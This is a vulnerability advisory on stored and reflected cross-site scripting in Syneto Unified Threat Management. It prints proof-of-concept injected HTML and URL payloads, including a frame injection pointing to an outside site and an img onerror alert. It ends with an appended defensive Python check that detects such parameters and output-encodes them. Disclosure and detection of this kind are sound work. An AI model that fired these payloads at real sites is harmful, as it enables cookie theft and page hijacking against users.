source: https://www.securityfocus.com/bid/51597/info
Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected.
Proof of Concept:
=================
The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user interaction.
For demonstration or reproduce ...

1.1.1
[+] Reports - Executive Summary - Output Listing Category
<tr id="list_1"class="tableRowEven"><td class="status" valign="top" align="center"><a href="https://www.exploit-db.com/exploits/36586/#" title="Disable the reporting list"class="disableList"><img src="https://www.exploit-db.com/exploits/36586/img/enabled.gif"
title="disable" alt="disable"class="disable"></a><a style="display: none;" href="https://www.exploit-db.com/exploits/36586/#" title="Enable the reporting list"class="enableList"><img src="https://www.exploit-db.com/exploits/36586/img/disabled.gif" title="enable" alt="enable"class="enable"></a></td><td valign="top">"><EXECUTION OF PERSISTENT SCRIPT CODE!>' <<="" td=""><td valign="top" nowrap="nowrap"><a href="https://www.exploit-db.com/exploits/36586/#"id="list_1"class="editList"><img src="https://www.exploit-db.com/exploits/36586/img/edit.gif" title="Edit" alt="Edit"/></a><a href="https://www.exploit-db.com/exploits/36586/syneto.php?menuid=307&action=delete&id=1"class="deleteList"><img src="https://www.exploit-db.com/exploits/36586/img/delete.gif" title="Delete" alt="Delete"/></a></td></tr></tbody></table></div>
Reference(s):
https://www.example.com.com/syneto.php?menuid=307

1.1.2
[+] EMail - Filter Add & Configure
<div>Sender =>"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div><div>Receiver =.*</div><div>Subject =.*(SPAM|VIAGRA).*</div>
Reference(s):
https://www.example.com.com/syneto.php?menuid=63

1.1.3
[+] EMail Settings - New Domain
"><table class="data"id="smtpDomainsList"><thead><tr><th class="status">Status</th><th class="domain">Domain</th><th class="routing">Routing</th><th class="verify_sender">Verify sender</th><th class="qdm">Send digest</th><th class="actions">Actions</th></tr></thead><tbody><tr id="domain_3"class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status"><input name="active" value="1"type="hidden"><input name="qdm_enabled" value=""type="hidden"><input name="qdm_hours" value="23"type="hidden"><input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden"><input name="verify_peer" value=""type="hidden"><input name="prefix_digest_links" value=""type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" /><input name="verify_sender" value=""type="hidden"><input name="verify_sender_network_name" value=""type="hidden"><input name="qdm_exceptions" value=""type="hidden"><input name="whitelist" value=""type="hidden"><input name="blacklist" value=""type="hidden"><img class="clickable tooltip" title="" src="https://www.exploit-db.com/exploits/36586/img/enabled.gif"></td><td class="domain">"><script>alert(vulnerabilitylab)</script></td>
Reference(s):
https://www.example.com.com/syneto.php?menuid=60

1.2
PoC:
https://www.example.com.com/index.php?error=need_login"'><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E
Reference(s):
https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
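
Added example (not part of the original advisory and not the vendor's code): a log-review check that flags requests whose error or info parameter is not a plain status token such as need_login, together with the HTML output encoding that keeps such a value from being rendered as markup. The token allowlist, the function names and the sample request targets are assumptions; the samples are constructed from the PoC URLs in section 1.2.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: these parameters are meant to carry short status tokens
# such as "need_login", so anything outside [A-Za-z0-9_-] is suspicious.
REFLECTED_PARAMS = {"error", "info"}
TOKEN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def suspicious_params(request_target):
    """Return [(name, decoded_value)] for reflected params that are not plain tokens."""
    query = urlsplit(request_target).query
    hits = []
    # parse_qsl percent-decodes each value, so encoded markup is seen as markup.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in REFLECTED_PARAMS and not TOKEN.fullmatch(value):
            hits.append((name, value))
    return hits


def render_message(value):
    """Output-encode a value for an HTML text or quoted-attribute context."""
    return html.escape(value, quote=True)


# Constructed sample request targets, modelled on the PoC URLs in section 1.2.
SAMPLES = [
    "/index.php?error=need_login&from_menu=238",
    "/index.php?error=need_login%22%27%3E%3Cframe%20src=http://www.vulnerability-lab.com%3E%3Chr%3E&from_menu=238",
    "/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E",
]

if __name__ == "__main__":
    for target in SAMPLES:
        for name, value in suspicious_params(target):
            # The logged value is encoded too, so a log viewer cannot render it.
            print(f"ALERT {name}: {render_message(value)}")
```

The same encoding has to be applied wherever stored values (list category, filter sender, domain name) are written back into the page, since the persistent cases in 1.1.1 to 1.1.3 never pass through these two query parameters.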